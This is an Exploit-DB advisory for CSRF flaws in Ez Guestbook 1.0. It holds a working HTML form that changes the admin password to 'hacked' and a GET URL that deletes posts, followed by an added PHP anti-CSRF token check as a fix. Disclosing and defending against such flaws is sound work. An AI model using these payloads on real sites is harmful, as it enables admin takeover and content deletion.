exploit-db-mirror/exploits/php/webapps/10420.txt

[-------------------------------------------------------------------------------------------------]
[ Title: Ez Guestbook 1.0 Multiple Vulnerabilities ]
[ Author: Milos Zivanovic ]
[ Email: milosz.security[at]gmail.com ]
[ Date: 14. December 2009. ]
[-------------------------------------------------------------------------------------------------]
[-------------------------------------------------------------------------------------------------]
[ Application: Ez Guestbook ]
[ Version: 1.0 ]
[ Link: http://www.scriptsez.net/?action=details&cat=Guestbooks&id=11873094083 ]
[ Price: 10 USD ]
[ Vulnerability: Cross Site Request Forgery ]
[-------------------------------------------------------------------------------------------------]
Ez Guestbook script version 1.0 suffers from multiple vulnerabilities:
[#]Content
|--Change admin password
|--Remove post by ID
[*]Change admin password
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/ez_gb/admin.php?action=change_password"
method="post">
<input type="hidden" name="admin_password" value="hacked">
<input type="hidden" name="c_admin_password" value="hacked">
<input type="hidden" name="add" value="true">
<input type="submit" name="submit" value=" CHANGE ">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]
[+]Remove post by ID
[POC----------------------------------------------------------------------------------------------]
http://localhost/ez_gb/admin.php?action=view&do=delete&id=[ID]
[POC----------------------------------------------------------------------------------------------]
[----------------------------------------------EOF------------------------------------------------]
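
Added example, not part of the original advisory and not Ez Guestbook's own code: a per-session anti-CSRF token check that rejects both requests shown above (the tokenless password-change POST and the GET-based delete). The function names, the csrf_token field name and the sample requests are assumptions; inside admin.php the arrays would be $_SESSION and $_POST.

```php
<?php
// Added example: CSRF guard for state-changing admin actions.
// Function names and the 'csrf_token' field are assumptions, not Ez Guestbook code.

// Create (once per session) and return the anti-CSRF token to embed in admin forms.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Allow a state-changing action only for a POST that carries the session's token.
function csrf_request_allowed(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false; // state changes (such as delete) are never accepted over GET
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // hash_equals compares in constant time; an empty expected token never matches.
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);
}

// Constructed requests mirroring the two cases in the advisory plus a legitimate one.
$session = [];
$token   = csrf_token($session);

$cases = [
    'password change POST without token' =>
        ['POST', ['admin_password' => 'x', 'c_admin_password' => 'x', 'add' => 'true']],
    'delete requested via GET link' =>
        ['GET', []],
    'admin form POST with session token' =>
        ['POST', ['admin_password' => 'x', 'c_admin_password' => 'x', 'csrf_token' => $token]],
];

foreach ($cases as $label => [$method, $post]) {
    $verdict = csrf_request_allowed($method, $post, $session) ? 'allowed' : 'rejected';
    printf("%-38s %s\n", $label, $verdict);
}
```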